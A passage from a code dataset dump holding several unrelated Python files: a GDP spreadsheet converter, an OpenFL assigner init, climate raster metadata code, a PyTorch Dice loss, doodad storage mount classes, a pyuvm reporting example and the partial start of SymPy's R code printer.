id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
1792477 | # this could easily be accomplished with a simple cut/paste transpose
# why am I making this more work than it needs to be?!
import os
import sys
import csv
import datetime
import subprocess
from collections import OrderedDict
from openpyxl import Workbook, load_workbook
# Convert the World Bank GDP-growth workbook (US row) into a two-column
# xlsx: Year | GDP_Growth.
os.chdir(os.path.dirname(os.path.abspath(__file__)))
GDP_PATH = "../data/raw/world_bank/"
OUTPUT_PATH = "../data/interim/"
GDP_FILE = "API_NY.GDP.MKTP.KD.ZG_DS2_en_excel_v2_422103.xls"
OUTPUT_FILE = "gdp.xlsx"
# requires libreoffice to be installed :-/
if not os.path.exists(OUTPUT_PATH):
    os.makedirs(OUTPUT_PATH)
subprocess.run([
    "soffice",
    "--headless",
    "--convert-to",
    "xlsx",
    os.path.join(GDP_PATH, GDP_FILE),
    "--outdir",
    OUTPUT_PATH
])
# soffice keeps the base name, so the converted file is the .xls path + "x".
fpath = os.path.join(OUTPUT_PATH, GDP_FILE) + "x"
wb = load_workbook(filename=fpath, data_only=True)
# Look the data sheet up by name instead of scanning sheet indices manually.
if "Data" not in wb.sheetnames:
    print("ERROR! Couldn't find data sheet.")
    sys.exit(1)
data_sheet = wb["Data"]
output_wb = Workbook()
output_ws = output_wb.active
output_ws.title = "GDP Growth"
output_ws.cell(row=1, column=1, value="Year")
output_ws.cell(row=1, column=2, value="GDP_Growth")
# data starts at column 6 (F), labels in row 4; US in row 254
# NOTE(review): `cell.column < 6` assumes openpyxl >= 2.6 where .column is an
# int (older versions returned a letter) -- TODO confirm pinned version.
out_row = 2
for cell in data_sheet[254]:
    if cell.column < 6:
        continue
    year = data_sheet.cell(row=4, column=cell.column).value
    gdp_growth = cell.value
    output_ws.cell(row=out_row, column=1, value=year)
    output_ws.cell(row=out_row, column=2, value=gdp_growth)
    out_row += 1
output_wb.save(os.path.join(OUTPUT_PATH, OUTPUT_FILE))
| StarcoderdataPython |
4811321 | <reponame>brandon-edwards/openfl
# Copyright (C) 2020-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
"""Assigner package."""
from .assigner import Assigner
from .random_grouped_assigner import RandomGroupedAssigner
from .static_grouped_assigner import StaticGroupedAssigner
# Public API of the assigner package.
__all__ = [
    'Assigner',
    'RandomGroupedAssigner',
    'StaticGroupedAssigner',
]
| StarcoderdataPython |
4807361 | <filename>scripts/climdata_to_csv.py
"""
A directory of climate data -> a json describing it
keys:
rcp
period
model
variable
filepath
month
units
"""
import os
import pandas
from glob import glob
from rasterstats import zonal_stats
from itertools import chain
worldclim_dir = "/Users/mperry/data/worldclim"
def past_rasts():
    """Yield one metadata dict for every past-climate GeoTIFF."""
    past_dir = os.path.join(worldclim_dir, 'past')
    for tif_path in glob(past_dir + "/*.tif"):
        stem, _ = os.path.splitext(os.path.basename(tif_path))
        # Filename layout: model (2 chars) + period (3 chars) + variable (2
        # chars) + month/bioclim digits.
        model = stem[0:2]
        period = stem[2:5]
        var = stem[5:7]
        if var == 'bi':
            # Bioclim rasters are not monthly; the digits are part of the name.
            month = 0
            var = var + stem[7:]
        else:
            month = int(stem[7:])
        yield {
            'rcp': 'na',
            'period': period,
            'model': model,
            'month': month,
            'variable': var,
            'path': tif_path,
        }
def future_rasts():
    """Yield one metadata dict for every future-climate GeoTIFF."""
    future_dir = os.path.join(worldclim_dir, 'future')
    for tif_path in glob(future_dir + "/*.tif"):
        stem, _ = os.path.splitext(os.path.basename(tif_path))
        # Filename layout: model (2) + rcp (2) + variable (2) + period (2)
        # + month/bioclim digits.
        model = stem[0:2]
        rcp = stem[2:4]
        var = stem[4:6]
        period = stem[6:8]
        if var == 'bi':
            # Bioclim rasters are not monthly; the digits are part of the name.
            month = 0
            var = var + stem[8:]
        else:
            month = int(stem[8:])
        yield {
            'rcp': rcp,
            'period': period,
            'model': model,
            'month': month,
            'variable': var,
            'path': tif_path,
        }
def current_rasts():
    """Yield one metadata dict for every current-climate ESRI grid.

    Bug fix: the original rebound the outer loop variable ``var``
    (``var = var + num``) inside the raster loop, so every bioclim raster
    after the first reused the previous raster's (already-suffixed) variable
    name.  The per-raster variable name is now computed into a fresh local.
    """
    current_dir = os.path.join(worldclim_dir, 'current')
    # ESRI Grids, not geotiffs
    variables = {
        'tmax': 'tx',
        'tmin': 'tn',
        'prec': 'pr',
        'bio': 'bi',
    }
    for customvar, var in variables.items():
        path_tmp = os.path.join(current_dir, customvar, customvar + "_*")
        for rast in glob(path_tmp):
            num = os.path.basename(rast).split("_")[1]
            if var != 'bi':
                month = int(num)
                variable = var
            else:
                # Bioclim rasters are not monthly; fold the number into the name.
                month = 0
                variable = var + num
            data = {
                'rcp': 'na',
                'period': 'current',
                'model': 'na',
                'month': month,
                'variable': variable,
                'path': rast + "/hdf.adf"
            }
            yield data
def get_dataframe():
    """Collect past, future and current raster metadata into one DataFrame."""
    rows = list(chain(past_rasts(), future_rasts(), current_rasts()))
    return pandas.DataFrame(rows)
if __name__ == "__main__":
    # Build the metadata table and persist it for later zonal-statistics runs.
    df = get_dataframe()
    df.to_csv("climate_data.csv", index=False)
    # df = pandas.read_csv("climate_data.csv")
    # import ipdb; ipdb.set_trace()
| StarcoderdataPython |
1747412 | <reponame>mistermoutan/ModelsGenesis
import torch
class DiceLoss:
    """Soft Dice score/loss for (possibly multi-channel) segmentation tensors."""

    @staticmethod
    def dice_loss(pred, target, smooth=0, eps=1e-7, return_loss=True, skip_zero_sum: bool = True, per_class=False):
        """
        Compute the soft Dice score (or loss) between ``pred`` and ``target``.

        pred: tensor with first dimension as batch; 3-D (HxWxD) or
            BxCxHxW / BxCxHxWxD.
        target: tensor with first dimension as batch; same shape as ``pred``.
        smooth: additive smoothing term for the numerator.
        eps: numerical-stability constant added to numerator and denominator.
        return_loss: if True return ``1 - dice`` (a loss), else the dice score.
        skip_zero_sum: currently unused -- the zero-sum channel skip is
            commented out below, so zero-sum channels are still included.
        per_class: if True return a list of per-channel values (plus the
            channel average appended when there is more than one channel).

        VERIFIED THAT WORKS EXACT SAME AS ACS soft dice except that they do
        not square the logits in the denominator and skip a channel
        computation if the sum of target for that specific channel is 0.
        EVEN THEIR DICE GLOBAL IS THE SAME FOR 1 CHANNEL OUTPUTS THAT ARE BINARY
        """
        # --- input validation -------------------------------------------------
        if not torch.is_tensor(pred) or not torch.is_tensor(target):
            raise TypeError("Input type is not a torch.Tensor. Got {} and {}".format(type(pred), type(target)))
        if len(pred.shape) not in (3, 4, 5):
            raise ValueError("Invalid input shape, we expect BxCxHxWxD. Got: {}".format(pred.shape))
        if not (pred.shape == target.shape):
            raise ValueError("input and target shapes must be the same. Got: {} and {}".format(pred.shape, target.shape))
        if not pred.device == target.device:
            raise ValueError("input and target must be in the same device. Got: {} and {}".format(pred.device, target.device))
        pred_shape = pred.shape
        # Reference for the (disabled) per-class zero-sum skip:
        # for i_class in range(n_classes):
        #    if targets[:,i_class].sum()>0:
        #        loss += dice_loss_perclass(probs[:,i_class], targets[:,i_class], smooth)
        # return loss / n_classes
        # Flatten each channel (or the whole tensor for 3-D input) into
        # (pred_flat, target_flat) pairs.
        list_of_flattened_channels = []
        if len(pred.shape) != 3:
            for channel_idx in range(pred_shape[1]):
                # if skip_zero_sum is True:
                if target[:, channel_idx].sum() <= 0:
                    # only 0's in target, may come from patching of task02;
                    # channel is still included (skip is commented out below).
                    print("0 ONLY IN THIS CHANNEL OF TARGET")
                    # raise ValueError
                    # continue
                iflat = pred[:, channel_idx].contiguous().view(-1)  # one channel: N x C x H x D x W -> flat
                tflat = target[:, channel_idx].contiguous().view(-1)
                list_of_flattened_channels.append((iflat, tflat))
        else:
            iflat = pred.contiguous().view(-1)  # comes as (x,y,z) so flatten everything
            tflat = target.contiguous().view(-1)
            list_of_flattened_channels.append((iflat, tflat))
        dice = 0
        dice_list = []
        for iflat, tflat in list_of_flattened_channels:
            # Soft dice with squared terms in the denominator.
            intersection = torch.sum(iflat * tflat)
            A_sum_sq = torch.sum(iflat * iflat)
            B_sum_sq = torch.sum(tflat * tflat)
            add = (2.0 * intersection + smooth + eps) / (A_sum_sq + B_sum_sq + eps)
            dice += add
            # NOTE(review): with smooth > 0 the numerator grows but the
            # denominator does not, so this assert can trip -- presumably
            # smooth is always left at 0; TODO confirm.
            assert 0 <= add <= 1, "{}".format(add)
            if per_class:
                dice_list.append((2.0 * intersection + smooth + eps) / (A_sum_sq + B_sum_sq + eps))
        # Average dice over channels.
        dice /= len(list_of_flattened_channels)
        if per_class and len(dice_list) > 1:
            dice_list.append(dice)  # final is average dice #should consider global dice?
        if not per_class:
            return 1 - dice if return_loss else dice
        if per_class:
            if return_loss:
                ret = [1 - i for i in dice_list]
                return ret
            else:
                return dice_list
if __name__ == "__main__":
    # Smoke test: identical all-ones tensors should give dice == 1 (loss == 0).
    loss = DiceLoss.dice_loss
    import numpy as np
    # a = np.random.rand(6,2)
    for _ in range(1000):
        a = np.ones((6, 1, 64, 64, 32))
        b = np.ones((6, 1, 64, 64, 32))
        a = torch.Tensor(a)
        b = torch.Tensor(b)
        l = loss(a, b)
        print(type(l))
        # NOTE(review): exits on the first iteration, so the code below and
        # the remaining 999 iterations never run.
        exit(0)
        if loss(a, b) > 0.8:
            # print(a)
            # print(b)
            pass
""" def compute_dice_coefficient(mask_gt, mask_pred):
Compute soerensen-dice coefficient.
compute the soerensen-dice coefficient between the ground truth mask `mask_gt`
and the predicted mask `mask_pred`.
Args:
mask_gt: 3-dim Numpy array of type bool. The ground truth mask.
mask_pred: 3-dim Numpy array of type bool. The predicted mask.
Returns:
the dice coeffcient as float. If both masks are empty, the result is NaN
volume_sum = mask_gt.sum() + mask_pred.sum()
if volume_sum == 0:
return np.NaN
volume_intersect = (mask_gt & mask_pred).sum()
return 2*volume_intersect / volume_sum """
r"""
def dice_loss(input, target):
smooth = 1.
iflat = input.view(-1)
tflat = target.view(-1)
intersection = (iflat * tflat).sum()
return 1 - ((2. * intersection + smooth) /
(iflat.sum() + tflat.sum() + smooth))
-------------------
class DiceLoss(nn.Module):
def __init__(self):
super(DiceLoss, self).__init__()
def forward(self, input, target):
N = target.size(0)
smooth = 1
input_flat = input.view(N, -1)
target_flat = target.view(N, -1)
intersection = input_flat * target_flat
loss = 2 * (intersection.sum(1) + smooth) / (input_flat.sum(1) + target_flat.sum(1) + smooth)
loss = 1 - loss.sum() / N
return loss
----------------------------------------------------
def dice_loss(true, logits, eps=1e-7):
Computes the Sørensen–Dice loss.
Note that PyTorch optimizers minimize a loss. In this
case, we would like to maximize the dice loss so we
return the negated dice loss.
Args:
true: a tensor of shape [B, 1, H, W].
logits: a tensor of shape [B, C, H, W]. Corresponds to
the raw output or logits of the model.
eps: added to the denominator for numerical stability.
Returns:
dice_loss: the Sørensen–Dice loss.
num_classes = logits.shape[1]
if num_classes == 1:
true_1_hot = torch.eye(num_classes + 1)[true.squeeze(1)]
true_1_hot = true_1_hot.permute(0, 3, 1, 2).float()
true_1_hot_f = true_1_hot[:, 0:1, :, :]
true_1_hot_s = true_1_hot[:, 1:2, :, :]
true_1_hot = torch.cat([true_1_hot_s, true_1_hot_f], dim=1)
pos_prob = torch.sigmoid(logits)
neg_prob = 1 - pos_prob
probas = torch.cat([pos_prob, neg_prob], dim=1)
else:
true_1_hot = torch.eye(num_classes)[true.squeeze(1)]
true_1_hot = true_1_hot.permute(0, 3, 1, 2).float()
probas = F.softmax(logits, dim=1)
true_1_hot = true_1_hot.type(logits.type())
dims = (0,) + tuple(range(2, true.ndimension()))
intersection = torch.sum(probas * true_1_hot, dims)
cardinality = torch.sum(probas + true_1_hot, dims)
dice_loss = (2. * intersection / (cardinality + eps)).mean()
return (1 - dice_loss)
------------------------------
from typing import Optional
import torch
import torch.nn as nn
import torch.nn.functional as F
from kornia.utils import one_hot
# based on:
# https://github.com/kevinzakka/pytorch-goodies/blob/master/losses.py
[docs]
class DiceLoss(nn.Module):
Criterion that computes Sørensen-Dice Coefficient loss.
According to [1], we compute the Sørensen-Dice Coefficient as follows:
.. math::
\text{Dice}(x, class) = \frac{2 |X| \cap |Y|}{|X| + |Y|}
where:
- :math:`X` expects to be the scores of each class.
- :math:`Y` expects to be the one-hot tensor with the class labels.
the loss, is finally computed as:
.. math::
text{loss}(x, class) = 1 - \text{Dice}(x, class)
[1] https://en.wikipedia.org/wiki/S%C3%B8rensen%E2%80%93Dice_coefficient
Shape:
- Input: :math:`(N, C, H, W)` where C = number of classes.
- Target: :math:`(N, H, W)` where each value is
:math:`0 ≤ targets[i] ≤ C−1`.
Examples:
N = 5 # num_classes
loss = kornia.losses.DiceLoss()
input = torch.randn(1, N, 3, 5, requires_grad=True)
target = torch.empty(1, 3, 5, dtype=torch.long).random_(N)
output = loss(input, target)
output.backward()
def __init__(self) -> None:
super(DiceLoss, self).__init__()
self.eps: float = 1e-6
def forward( # type: ignore
self,
input: torch.Tensor,
target: torch.Tensor) -> torch.Tensor:
if not torch.is_tensor(input):
raise TypeError("Input type is not a torch.Tensor. Got {}"
.format(type(input)))
if not len(input.shape) == 4:
raise ValueError("Invalid input shape, we expect BxNxHxW. Got: {}"
.format(input.shape))
if not input.shape[-2:] == target.shape[-2:]:
raise ValueError("input and target shapes must be the same. Got: {}"
.format(input.shape, input.shape))
if not input.device == target.device:
raise ValueError(
"input and target must be in the same device. Got: {}" .format(
input.device, target.device))
# compute softmax over the classes axis
input_soft = F.softmax(input, dim=1)
# create the labels one hot tensor
target_one_hot = one_hot(target, num_classes=input.shape[1],
device=input.device, dtype=input.dtype)
# compute the actual dice score
dims = (1, 2, 3)
intersection = torch.sum(input_soft * target_one_hot, dims)
cardinality = torch.sum(input_soft + target_one_hot, dims)
dice_score = 2. * intersection / (cardinality + self.eps)
return torch.mean(torch.tensor(1.) - dice_score)
######################
# functional interface
######################
[docs]
def dice_loss(
input: torch.Tensor,
target: torch.Tensor) -> torch.Tensor:
rFunction that computes Sørensen-Dice Coefficient loss.
See :class:`~kornia.losses.DiceLoss` for details.
return DiceLoss()(input, target)
----------------------------
def dice_loss(input,target):
input is a torch variable of size BatchxnclassesxHxW representing log probabilities for each class
target is a 1-hot representation of the groundtruth, shoud have same size as the input
assert input.size() == target.size(), "Input sizes must be equal."
assert input.dim() == 4, "Input must be a 4D Tensor."
uniques=np.unique(target.numpy())
assert set(list(uniques))<=set([0,1]), "target must only contain zeros and ones"
probs=F.softmax(input)
num=probs*target#b,c,h,w--p*g
num=torch.sum(num,dim=3)#b,c,h
num=torch.sum(num,dim=2)
den1=probs*probs#--p^2
den1=torch.sum(den1,dim=3)#b,c,h
den1=torch.sum(den1,dim=2)
den2=target*target#--g^2
den2=torch.sum(den2,dim=3)#b,c,h
den2=torch.sum(den2,dim=2)#b,c
dice=2*(num/(den1+den2))
dice_eso=dice[:,1:]#we ignore bg dice val, and take the fg
dice_total=-1*torch.sum(dice_eso)/dice_eso.size(0)#divide by batch_sz
-----------------------------
def dice_loss(pred, target):
This definition generalize to real valued pred and target vector.
This should be differentiable.
pred: tensor with first dimension as batch
target: tensor with first dimension as batch
smooth = 1.
# have to use contiguous since they may from a torch.view op
iflat = pred.contiguous().view(-1)
tflat = target.contiguous().view(-1)
intersection = (iflat * tflat).sum()
A_sum = torch.sum(tflat * iflat)
B_sum = torch.sum(tflat * tflat)
return 1 - ((2. * intersection + smooth) / (A_sum + B_sum + smooth) )
---------------------------------
"""
| StarcoderdataPython |
1640569 | """
These objects are pointers to code/data you wish to give access
to a launched job.
Each object defines a source and a mount point (where the directory will be visible
to the launched process)
"""
import os
import tarfile
import tempfile
from contextlib import contextmanager
class Mount(object):
    """
    Base class for a directory exposed to a launched job.

    Args:
        mount_point (str): Location of directory visible to the running process
        pythonpath (bool): If True, adds this folder to the $PYTHON_PATH environment variable
        output (bool): If False, this is a "code" directory. If True, this should be an empty
            "output" directory (nothing will be copied to remote)
    """
    def __init__(self, mount_point=None, pythonpath=False, output=False):
        self.pythonpath = pythonpath
        # "code" mounts are read-only; "output" mounts are writable.
        self.read_only = not output
        self.set_mount(mount_point)
        # Filled in later by the launch machinery.
        self.path_on_remote = None
        self.local_file_hash = None

    def set_mount(self, mount_point):
        """Record the mount point.

        Fix: the original ``if mount_point: ... else: ...`` had two identical
        branches (dead conditional); the assignment is now unconditional.
        """
        self.mount_point = mount_point
class MountLocal(Mount):
    """A mount backed by a directory on the local filesystem.

    Args:
        local_dir (str): Source directory on the local machine.
        mount_point (str): Where the directory appears to the launched
            process; defaults to ``local_dir`` itself (no remount).
        cleanup (bool): Whether the copy should be cleaned up afterwards.
        filter_ext (tuple): File extensions excluded from the archive.
        filter_dir (tuple): Directory names excluded from the archive.
    """
    def __init__(self, local_dir, mount_point=None, cleanup=True,
                 filter_ext=('.pyc', '.log', '.git', '.mp4', '.idea'),
                 filter_dir=('data',),
                 **kwargs):
        super(MountLocal, self).__init__(mount_point=mount_point, **kwargs)
        # Resolve symlinks and ``~`` once; keep the raw form for reference.
        self.local_dir = os.path.realpath(os.path.expanduser(local_dir))
        self.local_dir_raw = local_dir
        self.cleanup = cleanup
        self.filter_ext = filter_ext
        self.filter_dir = filter_dir
        if mount_point is None:
            # Mount at the same path as the source: no remount needed.
            self.set_mount(local_dir)
            self.no_remount = True
        else:
            self.no_remount = False
        #print('local_dir %s, mount_point %s(%s)' % (self.local_dir, self.mount_point, mount_point))

    def create_if_nonexistent(self):
        """Ensure the local source directory exists."""
        os.makedirs(self.local_dir, exist_ok=True)

    @contextmanager
    def gzip(self):
        """
        Return filepath to a gzipped version of this directory for uploading.

        NOTE(review): despite the name, mode="w" writes an *uncompressed*
        tar archive, not gzip -- TODO confirm whether "w:gz" was intended.
        The temp file is deleted when the context exits, so consume the
        yielded path inside the ``with`` block.
        """
        assert self.read_only

        def filter_func(tar_info):
            # Drop members matching the excluded extensions or directories.
            filt = any([tar_info.name.endswith(ext) for ext in self.filter_ext]) or any([ tar_info.name.endswith('/'+ext) for ext in self.filter_dir])
            if filt:
                return None
            return tar_info

        with tempfile.NamedTemporaryFile('wb+', suffix='.tar') as tf:
            # make a tar.gzip archive of directory
            with tarfile.open(fileobj=tf, mode="w") as tar:
                #tar.add(self.local_dir, arcname=os.path.splitext(os.path.basename(tf.name))[0], filter=filter_func)
                tar.add(self.local_dir, arcname=os.path.basename(self.local_dir), filter=filter_func)
            # Rewind so readers of the yielded path see a complete archive.
            tf.seek(0)
            yield tf.name

    def __str__(self):
        return 'MountLocal@%s'%self.local_dir

    def mount_dir(self):
        # Remote-side location: everything lives under /mounts, with any
        # leading '~/' stripped from the mount point.
        return os.path.join('/mounts', self.mount_point.replace('~/',''))
class MountGitRepo(Mount):
    """Placeholder mount backed by a remote git repository (unimplemented)."""
    def __init__(self, git_url, git_credentials=None, **kwargs):
        # Fix: the original passed ``read_only=True`` to Mount.__init__, which
        # has no such parameter, so construction raised TypeError instead of
        # the intended NotImplementedError.  ``read_only`` already defaults to
        # True via ``output=False``.
        super(MountGitRepo, self).__init__(**kwargs)
        self.git_url = git_url
        self.git_credentials = git_credentials
        raise NotImplementedError()
class MountGCP(Mount):
    """A mount backed by a Google Cloud Storage bucket path."""

    def __init__(self, gcp_path, gcp_bucket_name, sync_interval=15, output=False,
                 include_types=('*.txt', '*.csv', '*.json', '*.gz', '*.tar', '*.log', '*.pkl'), **kwargs):
        # NOTE(review): ``output`` is stored locally but not forwarded to
        # Mount.__init__, so ``read_only`` is unaffected by it -- TODO confirm
        # that this asymmetry is intended.
        super(MountGCP, self).__init__(**kwargs)
        self.gcp_bucket_name = gcp_bucket_name
        self.gcp_path = gcp_path
        self.output = output
        self.sync_interval = sync_interval
        self.sync_on_terminate = True
        self.include_types = include_types

    def __str__(self):
        return 'MountGCP@gcp://%s/%s' % (self.gcp_bucket_name, self.gcp_path)

    @property
    def include_string(self):
        """Space-separated ``--include`` flags for each allowed file pattern."""
        flags = ["--include '%s'" % pattern for pattern in self.include_types]
        return ' '.join(flags)
class MountS3(Mount):
    """A mount backed by an Amazon S3 bucket path."""

    def __init__(self, s3_path, s3_bucket=None, sync_interval=15, output=False,
                 include_types=('*.txt', '*.csv', '*.json', '*.gz', '*.tar', '*.log', '*.pkl'), **kwargs):
        super(MountS3, self).__init__(**kwargs)
        if s3_bucket is None:
            # No bucket given: fall back to the one configured for EC2 mode.
            from doodad.ec2.autoconfig import AUTOCONFIG
            s3_bucket = AUTOCONFIG.s3_bucket()
        self.s3_bucket = s3_bucket
        self.s3_path = s3_path
        self.output = output
        self.sync_interval = sync_interval
        self.sync_on_terminate = True
        self.include_types = include_types

    def __str__(self):
        return 'MountS3@s3://%s/%s' % (self.s3_bucket, self.s3_path)

    @property
    def include_string(self):
        """Space-separated ``--include`` flags for each allowed file pattern."""
        flags = ["--include '%s'" % pattern for pattern in self.include_types]
        return ' '.join(flags)
| StarcoderdataPython |
3360602 | <gh_stars>100-1000
#
#//----------------------------------------------------------------------
#// Copyright 2007-2010 Mentor Graphics Corporation
#// Copyright 2007-2010 Cadence Design Systems, Inc.
#// Copyright 2010-2011 Synopsys, Inc.
#// Copyright 2019-2020 <NAME> (tpoikela)
#// All Rights Reserved Worldwide
#//
#// Licensed under the Apache License, Version 2.0 (the
#// "License"); you may not use this file except in
#// compliance with the License. You may obtain a copy of
#// the License at
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in
#// writing, software distributed under the License is
#// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
#// CONDITIONS OF ANY KIND, either express or implied. See
#// the License for the specific language governing
#// permissions and limitations under the License.
#//----------------------------------------------------------------------
# About: UVM Reporting methods
# This example will illustrate the usage of UVM reporting functions,
# and mainly focusing on the fine-tuning of reporting
# To get more details about the reporting related methods, check the file:
# - uvm/src/base/uvm_report_object.py
# - uvm/src/base/uvm_component.py - Hierarchical reporting methods
import cocotb
from cocotb.triggers import Timer
from uvm.macros import uvm_component_utils, uvm_info
from uvm import (UVMCoreService, UVMComponent, UVM_MEDIUM, sv, UVMTest,
run_test, UVM_LOW, UVM_LOG, UVM_DISPLAY, UVM_INFO, UVMReportCatcher)
class my_child(UVMComponent):
    """Leaf component used to demonstrate hierarchical report configuration."""

    def __init__(self, name, parent):
        super().__init__(name, parent)
        # Message ID used for this component's reports.
        self.tag = "MY_CHILD"

    async def main_phase(self, phase):
        # Emit a report; its routing/verbosity is configured by the parent test.
        uvm_info(self.tag, 'main_phase started in child', UVM_MEDIUM)

    def get_packet(self):
        # Report before delegating to the base-class implementation.
        uvm_info("PKTGEN", sv.sformatf("Getting a packet from %s (%s)",
            self.get_full_name(), self.get_type_name()), UVM_MEDIUM)
        return super().get_packet()


# Use the macro in a class to implement factory registration along with other
# utilities (create, get_type_name). To just do factory registration, use the
# macro `uvm_object_registry(mygen,"mygen")
uvm_component_utils(my_child)
class my_top_test(UVMTest):
    """Top-level test that redirects all child reports to a master log file."""

    def __init__(self, name="my_top_test", parent=None):
        super().__init__(name, parent)
        # Message ID used for this test's own reports.
        self.tag = 'MY_TOP_TEST'

    def build_phase(self, phase):
        super().build_phase(phase)
        # Create the child through the factory so it can be overridden.
        self.child = my_child.type_id.create('my_child', self)

    def connect_phase(self, phase):
        # Route every UVM_INFO message in this hierarchy both to the default
        # log file and to the console.
        self.def_file = open('uvm_master_log.log', 'w')
        self.set_report_default_file_hier(self.def_file)
        self.set_report_severity_action_hier(UVM_INFO, UVM_LOG | UVM_DISPLAY)

    async def main_phase(self, phase):
        # Keep the phase alive for 10 ns while the child also runs.
        phase.raise_objection(self, 'main_phase_started')
        uvm_info(self.tag, 'main_phase started', UVM_MEDIUM)
        await Timer(10, 'NS')
        phase.drop_objection(self, 'main_phase_ending')

    def final_phase(self, phase):
        # Close the master log; the message below is emitted *after* the close,
        # so it only reaches the console, not the file.
        #uvm_info(self.tag, "Closing the file handle now", UVM_LOW)
        self.def_file.close()
        uvm_info(self.tag, "Closing the file handle now", UVM_LOW)


# Use the macro in after the class to implement factory registration along with other
# utilities (create, get_type_name).
uvm_component_utils(my_top_test)
@cocotb.test()
async def module_top(dut):
    """cocotb entry point: start the UVM test by name via the factory."""
    # cs_ = UVMCoreService.get()  # type: UVMCoreService
    # uvm_root = cs_.get_root()
    # factory = cs_.get_factory()
    # factory.print_factory(1)
    # If a string is used to run_test, run_test will used the string based factory
    # create method to create an object of the desired type.
    await run_test("my_top_test")
| StarcoderdataPython |
4824574 | <filename>sympy/printing/rcode.py
"""
R code printer
The RCodePrinter converts single sympy expressions into single R expressions,
using the functions defined in math.h where possible.
"""
from __future__ import print_function, division
from sympy.codegen.ast import Assignment
from sympy.printing.codeprinter import CodePrinter
from sympy.printing.precedence import precedence, PRECEDENCE
from sympy.sets.fancysets import Range
# dictionary mapping sympy function to (argument_conditions, C_function).
# Used in RCodePrinter._print_Function(self)
known_functions = {
    #"Abs": [(lambda x: not x.is_integer, "fabs")],
    "Abs": "abs",
    "sin": "sin",
    "cos": "cos",
    "tan": "tan",
    "asin": "asin",
    "acos": "acos",
    "atan": "atan",
    "atan2": "atan2",
    "exp": "exp",
    "log": "log",
    "erf": "erf",
    "sinh": "sinh",
    "cosh": "cosh",
    "tanh": "tanh",
    "asinh": "asinh",
    "acosh": "acosh",
    "atanh": "atanh",
    "floor": "floor",
    "ceiling": "ceiling",
    "sign": "sign",
    "Max": "max",
    "Min": "min",
    "factorial": "factorial",
    "gamma": "gamma",
    "digamma": "digamma",
    "trigamma": "trigamma",
    "beta": "beta",
}

# These are the core reserved words in the R language. Taken from:
# https://cran.r-project.org/doc/manuals/r-release/R-lang.html#Reserved-words
reserved_words = ['if',
                  'else',
                  'repeat',
                  'while',
                  'function',
                  'for',
                  'in',
                  'next',
                  'break',
                  'TRUE',
                  'FALSE',
                  'NULL',
                  'Inf',
                  'NaN',
                  'NA',
                  'NA_integer_',
                  'NA_real_',
                  'NA_complex_',
                  'NA_character_',
                  # NOTE(review): 'volatile' is not in R's reserved-word list;
                  # it was likely carried over from the C printer -- TODO confirm.
                  'volatile']
class RCodePrinter(CodePrinter):
    """A printer to convert python expressions to strings of R code"""
    printmethod = "_rcode"
    language = "R"

    # Default settings; each key can be overridden through the ``settings``
    # dict passed to the constructor.
    _default_settings = {
        'order': None,
        'full_prec': 'auto',
        'precision': 15,
        'user_functions': {},
        'human': True,
        'contract': True,
        'dereference': set(),
        'error_on_reserved': False,
        'reserved_word_suffix': '_',
    }
    # R's (vectorised) logical operators.
    _operators = {
        'and': '&',
        'or': '|',
        'not': '!',
    }
    # No relational-operator overrides; the defaults already match R.
    _relationals = {
    }

    def __init__(self, settings={}):
        # NOTE(review): mutable default argument; presumably never mutated by
        # CodePrinter.__init__ -- TODO confirm.
        CodePrinter.__init__(self, settings)
        self.known_functions = dict(known_functions)
        userfuncs = settings.get('user_functions', {})
        self.known_functions.update(userfuncs)
        self._dereference = set(settings.get('dereference', []))
        self.reserved_words = set(reserved_words)

    def _rate_index_position(self, p):
        """Weight used when ordering loop indices for tensor contraction."""
        return p*5

    def _get_statement(self, codestring):
        """Terminate a statement with a semicolon (valid, if unidiomatic, R)."""
        return "%s;" % codestring

    def _get_comment(self, text):
        # NOTE(review): R comments start with '#', not '//' -- TODO confirm
        # before relying on emitted comments being parseable by R.
        return "// {0}".format(text)

    def _declare_number_const(self, name, value):
        """Emit an assignment declaring a numeric constant."""
        return "{0} = {1};".format(name, value)

    def _format_code(self, lines):
        return self.indent_code(lines)

    def _traverse_matrix_indices(self, mat):
        """Iterate matrix positions in row-major order."""
        rows, cols = mat.shape
        return ((i, j) for i in range(rows) for j in range(cols))

    def _get_loop_opening_ending(self, indices):
        """Returns a tuple (open_lines, close_lines) containing lists of codelines
        """
        open_lines = []
        close_lines = []
        loopstart = "for (%(var)s in %(start)s:%(end)s){"
        for i in indices:
            # R arrays start at 1 and end at dimension
            open_lines.append(loopstart % {
                'var': self._print(i.label),
                'start': self._print(i.lower+1),
                'end': self._print(i.upper + 1)})
            close_lines.append("}")
        return open_lines, close_lines

    def _print_Pow(self, expr):
        """Print powers, special-casing reciprocal and square root."""
        if "Pow" in self.known_functions:
            return self._print_Function(expr)
        PREC = precedence(expr)
        if expr.exp == -1:
            return '1.0/%s' % (self.parenthesize(expr.base, PREC))
        elif expr.exp == 0.5:
            return 'sqrt(%s)' % self._print(expr.base)
        else:
            return '%s^%s' % (self.parenthesize(expr.base, PREC),
                              self.parenthesize(expr.exp, PREC))

    def _print_Rational(self, expr):
        # Print as a float division so R does not truncate.
        p, q = int(expr.p), int(expr.q)
        return '%d.0/%d.0' % (p, q)

    def _print_Indexed(self, expr):
        """Print an indexed element, e.g. ``x[i, j]``."""
        inds = [ self._print(i) for i in expr.indices ]
        return "%s[%s]" % (self._print(expr.base.label), ", ".join(inds))

    def _print_Idx(self, expr):
        return self._print(expr.label)

    def _print_Exp1(self, expr):
        # Euler's number; R has no named constant for it.
        return "exp(1)"

    def _print_Pi(self, expr):
        return 'pi'

    def _print_Infinity(self, expr):
        return 'Inf'

    def _print_NegativeInfinity(self, expr):
        return '-Inf'

    def _print_Assignment(self, expr):
        """Print ``lhs = rhs;``, expanding matrix and indexed assignments."""
        from sympy.matrices.expressions.matexpr import MatrixSymbol
        from sympy.tensor.indexed import IndexedBase
        lhs = expr.lhs
        rhs = expr.rhs
        # We special case assignments that take multiple lines
        #if isinstance(expr.rhs, Piecewise):
        #    from sympy.functions.elementary.piecewise import Piecewise
        #    # Here we modify Piecewise so each expression is now
        #    # an Assignment, and then continue on the print.
        #    expressions = []
        #    conditions = []
        #    for (e, c) in rhs.args:
        #        expressions.append(Assignment(lhs, e))
        #        conditions.append(c)
        #    temp = Piecewise(*zip(expressions, conditions))
        #    return self._print(temp)
